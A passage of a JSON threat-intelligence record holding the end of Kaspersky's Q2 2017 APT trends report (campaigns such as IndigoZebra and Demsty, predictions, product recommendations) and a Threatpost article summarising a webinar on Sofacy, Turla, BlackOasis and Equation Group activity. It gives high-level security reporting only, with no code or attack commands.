While Chinese speaking actors are active on a daily basis, not much has changed and we prefer to avoid producing reports on 'yet another instance of APTxx' for the sake of padding our numbers. Instead we try to focus on new and exciting campaigns that warrant special attention.\n\nOne of those reports detailed a new finding regarding a fileless version of the well-known 'HiKit' malware dubbed 'Hias'. We have reported on Hias in the past, and one of our researchers was finally able to discover the persistence mechanism used, which also allowed us to tie the activity to an actor we call 'CloudComputating'.\n\nAnother report detailed a new campaign we referred to as 'IndigoZebra'. This campaign was targeting former Soviet Republics with a wide swath of malware including Meterpreter, Poison Ivy, xDown, and a previously unknown malware called 'xCaon'. This campaign shares ties with other well-known Chinese-speaking actors, but no definitive attribution has been made at this time.\n\n 1. Updated technical analysis of Hias RAT\n 2. IndigoZebra - Intelligence preparation to high-level summits in Middle Asia\n\n## Best of the rest\n\nSometimes we find new and exciting campaigns or entirely new threat actors to report to our subscribers without being able to make an immediate or definitive determination on regional provenance. Several reports fell into this category in the last quarter. ChasingAdder is a report describing a new persistence technique that hijacked a legitimate WMI DLL for the purposes of loading a malicious payload. This activity targeted high-profile diplomatic, military, and research organizations beginning in the fall of 2016, but to date we have not been able to pinpoint the specific actor responsible.\n\nDemsty is a new piece of MacOS malware that is targeting University researchers in Hong Kong, among others. 
At the time of writing, we have a low confidence assessment that the campaign was conducted by Chinese-speaking actors, and thus categorize this as 'Unknown' until greater evidence comes to light.\n\nDuring Q2, the mischievous ShadowBrokers also continued their regular activities dumping multiple tools and documentation allegedly stolen from Equation Group. In April, the ShadowBrokers released another dump of information detailing the alleged targeting of SWIFT service bureaus and other banks by Equation Group. Since some of our customers are financial entities, we found it necessary to evaluate the data and provide an expert's opinion on the validity of the dump.\n\nReports in the 'unknown' category:\n\n 1. ShadowBrokers' Lost in translation leak - SWIFT attacks analysis\n 2. ChasingAdder - WMI DLL Hijacking Trojan Targeting High Profile Victims\n 3. University Researchers Located in Hong Kong Targeted with Demsty\n\n## Predictions\n\nBased on the trends we've seen over the last three months, as well as foreseeable geopolitical events, we have listed a few predictions for the upcoming quarter (Q3). As always, this isn't an exact science and some cases won't come to fruition. Analyzing current and future events and combining those with the motivations of known active actors can help organizations prepare for likely forthcoming activity:\n\n 1. Misinformation campaigns will remain a threat to countries with upcoming elections, specifically Germany and Norway, as they have been previous targets for Eastern European based actors.\n 2. 'Lawful Surveillance' tools will continue to be utilized by governments that don't have well-established Cyber Operations capabilities, mainly based out of the Middle East. Companies such as Gamma Group, Hacking Team, and NSO will continue to offer new zero-day exploits to those customers. As prices increase and exchanges thrive, new organizations and marketplaces will continue popping up.\n 3. 
Destructive malware disguised as ransomware will continue to be a problem. In the last quarter we've seen two instances of this, and with the continued release of tools / exploits from dumps like Vault7 and ShadowBrokers, this is going to be a new alarming trend to deal with.\n 4. In China, the past months have been marked by the dwindling economic growth, rising tensions with North Korea and the US, and increased exchanges between South Korean / Japanese / American organizations. In addition to these, the 19th Party Congress is set to be held in the fall of 2017 and according to multiple public predictions, it is likely that some major changes will happen in the leadership. It's possible that these events will have wide regional influences that could affect the way that threat actors operate in Asia, both in terms of targeting and TTPs.\n 5. Targeting energy-related companies and organizations will be on the rise. Countries such as Norway may be a top target moving forward given their control on oil and gas in the region in the buildup to an election. Saudi Arabia will also top the charts for potential targeting as they have in years past.\n 6. Lower-tier threat actors continue to increase cyber-espionage efforts and capabilities both in complexity and size. Expect more activity with varied technical capabilities coming from lesser known or previously unseen actors.\n\n## How to keep yourself protected\n\nOne of the biggest problems when it comes to leveraging threat intelligence is judging the quality of the data and how it can be used for defense. For instance, we may observe an increase in the number of fileless attacks or attacks in which all IOCs are unique or specific per victim. 
In such situations, having not only host-based IOCs, but also network IOCs and Yara rules that can help identify malware in all cases is very important.\n\nAnother problem comes from the fact that many threat intelligence providers have a limited world view and their data covers only a small set of threats. It's easy for an enterprise to fall into the trap of thinking that 'actor X' is not something they need to worry about because their focus has been only on certain countries or certain industry sectors; only to discover later that their ignorance left them blind to those attacks.\n\nAs shown by many incidents, but especially by WannaCry and ExPetr's EternalBlue-based spreading subroutines, vulnerabilities remain a key approach to infecting systems. Therefore timely patching is of utmost importance \u2013 which, being one of the most tedious IT maintenance tasks, works much better with good automation. Kaspersky Endpoint Security for Business Advanced and Kaspersky Total Security include Vulnerability & Patch management components, offering convenient tools for making patching much easier, and much less time-consuming for IT staff.\n\nGiven the above, it is highly recommended that prevention (such as endpoint protection) along with advanced detection capabilities, such as a solution that can detect all types of anomalies and scrutinize suspicious files at a deeper level, be present on users' systems. The Kaspersky Anti Targeted Attack solution (KATA) matches events coming from different infrastructure levels, discerns anomalies and aggregates them into incidents, while also studying related artifacts in a safe environment of a sandbox. 
As with most Kaspersky products, KATA is powered by HuMachine Intelligence, which is backed by on premise and in lab-running machine learning processes coupled with real-time analyst expertise and our understanding of threat intelligence big data.\n\nThe best way to prevent attackers from finding and leveraging security holes is to eliminate the holes altogether, including those involving improper system configurations or errors in proprietary applications. For this, Kaspersky Penetration Testing and Application Security Assessment services can become a convenient and highly effective solution, providing not only data on found vulnerabilities, but also advising on how to fix them, further strengthening corporate security.", "modified": "2017-08-08T14:00:40", "published": "2017-08-08T14:00:40", "href": "https://securelist.com/apt-trends-report-q2-2017/79332/", "id": "SECURELIST:75F0B75D28318C525992E42495D8C5EE", "title": "APT Trends report Q2 2017", "type": "securelist", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "threatpost": [{"lastseen": "2018-10-06T22:53:18", "bulletinFamily": "info", "cvelist": ["CVE-2015-5119", "CVE-2016-0984", "CVE-2016-4117", "CVE-2017-0199", "CVE-2017-0261"], "description": "Attackers behind advanced persistent threat campaigns have kept busy over the past several months, adding new ways to bypass detection, crafting new payloads to drop, and identifying new zero days and backdoors to help them infect users and maintain persistence on machines.\n\nJuan Andres Guerrero-Saade and Brian Bartholomew, members of Kaspersky Lab\u2019s [Global Research and Analysis Team,](<https://securelist.com/apt-trends-report-q2-2017/79332/>) described some of the tactics the researchers have seen in Q2 2017 in [a webinar](<https://www.brighttalk.com/webcast/15591/273279>) Tuesday morning. 
The company used the webinar and [the quarterly report it was based on](<https://securelist.com/apt-trends-report-q2-2017/79332/>) to help pull back the veil on threats previously covered by its private intelligence reporting service.\n\nA chunk of the presentation was spent recapping tweaks recently made by Russian-speaking groups Sofacy and Turla.\n\nSofacy, the group implicated by a December [DHS report](<https://threatpost.com/fbi-dhs-report-links-fancy-bear-to-election-hacks/122802/>) to election hacks, began using two new macro techniques in April. One abused Windows\u2019 certutil utility to extract payloads\u2014the first time the researchers had seen that technique used\u2014another embedded payloads in the EXIF metadata of malicious Office documents.\n\n\u201cAfter we started digging into this we found that they were actually using this technique dating back to December 2016,\u201d Bartholomew said, adding that what made the techniques interesting is that they were used to target French political party members prior to the French election on April 23 and May 7.\n\nIn June, the researchers noticed that Sofacy had updated a payload, written in Delphi, called Zebrocy. The new iteration, version 5.1 of Zebrocy, implemented new encryption keys and minor string obfuscations, something which helps it bypass detection capabilities, Bartholomew said.\n\nBartholomew said the researchers were able to tie Zebrocy to Sofacy in mid-2016.\n\n\u201cThere were some infrastructure ties there,\u201d Bartholomew said, \u201cThere was also another payload called Delphocy that was also written in Delphi. In late 2015 we started seeing Delphi payloads pop up from this group, which we hadn\u2019t seen before. We don\u2019t know why that\u2019s the case, it could be that they hired a developer who just refuses to write anything but Delphi. 
Either way, once Zebrocy was discovered, it was found in parallel to another Sofacy infection, once we started digging into it there was a little bit of shared code in the Delphi\u2014compared to the other Delphocy payload\u2014and ties to the infrastructure to Sofacy.\u201d\n\nEarlier this spring researchers said they were able to make a potential link between Turla, the APT linked to Moonlight Maze at SAS earlier this year, and Sofacy. Like Sofacy was doing around the same time, Turla was spotted using an EPS zero day (CVE-2017-0261) to target foreign ministries and governments.\n\n\u201cWhat\u2019s interesting about that is that it may actually indicate a shared supply chain between Turla and Sofacy,\u201d Bartholomew said.\n\nBartholomew also took time on Tuesday to discuss BlackOasis, a Middle Eastern-speaking group that\u2019s believed to be a client of Gamma Group, the UK-based firm that specializes in surveillance and monitoring equipment, such as FinFisher.\n\nHe claims the group, which he\u2019s spent the better chunk of a year and a half researching, has been spotted using several zero days in the past, including CVE-2016-4117, CVE-2016-0984, and CVE-2015-5119. Bartholomew says that what makes it interesting is that the group was the first seen using CVE-2017-0199, an OLE2Link zero-day, in the wild before it was detected. The exploit\u2019s end payload, he adds, is a new variant of FinSpy heavily fortified to prevent analysis by researchers.\n\n\u201cWe\u2019re currently trying to look into that, write some decryptors for it and will probably write another report on that in the next couple of months,\u201d Bartholomew said.\n\nCiting their technical sophistication and development, Guerrero-Saade was eager to discuss a crop of English speaking APT actors, including those behind an Equation Group backdoor, EQUATIONVECTOR. 
While the backdoor has been around since 2006, Guerrero-Saade said what makes it interesting is the fact that it\u2019s the first example of a NOBUS\u2014NObody But US backdoor\u2014they\u2019ve seen in the wild. The backdoor, a passive and active staging backdoor, could be used to execute shellcode payloads, according to the researcher.\n\nAnother backdoor, Gray Lambert\u2014an extension of the [Lamberts APT](<https://threatpost.com/tools-used-by-lamberts-apt-found-in-vault-7-dumps/124900/>) group\u2014is a much more modern implementation, Guerrero-Saade said. It waits, sleeps, and sniffs the network until it\u2019s ready to be used.\n\n\u201cWhat makes this NOBUS backdoor particularly interesting is that it provides attackers with a sort of surgical precision over a network of multiple infected machines,\u201d Guerrero-Saade said. \u201cWith Gray Lambert installed on these machines [attackers] can essentially decide how they\u2019re going to space their payloads, their commands and attacks.\u201d\n\nThe researchers suggest that users should expect more of the same tactics, techniques, and procedures (TTPs) from APT groups going forward. It\u2019s likely countries that have upcoming elections, Germany and Norway for example, will become targets for misinformation campaigns like the one mounted by the Sofacy group. 
Controversial lawful surveillance tools, like those peddled by the Gamma Group to BlackOasis and those sold by the [NSO Group to the Mexican government](<https://threatpost.com/mexican-journalists-lawyers-focus-of-government-spyware/126367/>), will remain popular as well, Guerrero-Saade and Bartholomew said.\n\nThe trend of destructive malware disguised as ransomware will likely continue as well, Guerrero-Saade says, but admits it\u2019s a curious question whether or not the technique will ever be embraced by cybercriminals.\n\n\u201cWe\u2019ve been talking about incompetent people entering the ransomware space for quite some time now,\u201d Guerrero-Saade said, \u201cWe\u2019re going to see people who are poor coders and won\u2019t even bother to buy an already prepared kit, just essentially trying to leverage something that deletes all the files, or doesn\u2019t do anything but tries to get money out of na\u00efve or unsuspecting victims. The notion of wipers as ransomware is quite different. It\u2019s an interesting phenomenon.\u201d\n\n\u201cSabotage attacks and wiper attacks are a strange occurrence, they don\u2019t happen that often. I think over the past 10 years we\u2019ve looked at 10 cases tops. They\u2019re very rare components. For the most part I think it has to do with the level of access that you\u2019re burning whenever you use them,\u201d Guerrero-Saade said, \u201cIf you\u2019re a cyberespionage actor, if you have access to a network at that point, a Sony or Saudi Aramco, where you can target thousands of machines, the idea of burning that loudly, raising the security profile of the organization as a whole and creating public fallout is extremely costly. 
It\u2019s a strange circumstance where the calculus pays off.\u201d\n\nWhile it may not be a popular technique for cybercriminals on a lower level, Guerrero-Saade said, it\u2019s not out of the realm of possibility for APT gangs to continue to use the vector to create havoc.\n\n\u201cLet\u2019s say we have all the means for a sabotage attack and we want to disguise it as ransomware or as something potentially treatable, it\u2019s not necessarily that different from what the Lazarus Group did with Sony, or some other South Korean targets, where first they asked for money and then dumped data anyways. It\u2019s an evolution that\u2019s particularly troubling,\u201d Guerrero-Saade said.\n", "modified": "2017-08-22T12:54:04", "published": "2017-08-08T16:34:08", "id": "THREATPOST:BAC3CD99B74F1D6CD22A123ED632AA3F", "href": "https://threatpost.com/updates-to-sofacy-turla-highlight-2017-q2-apt-activity/127297/", "type": "threatpost", "title": "Updates to Sofacy, Turla Highlight 2017 Q2 APT Activity", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}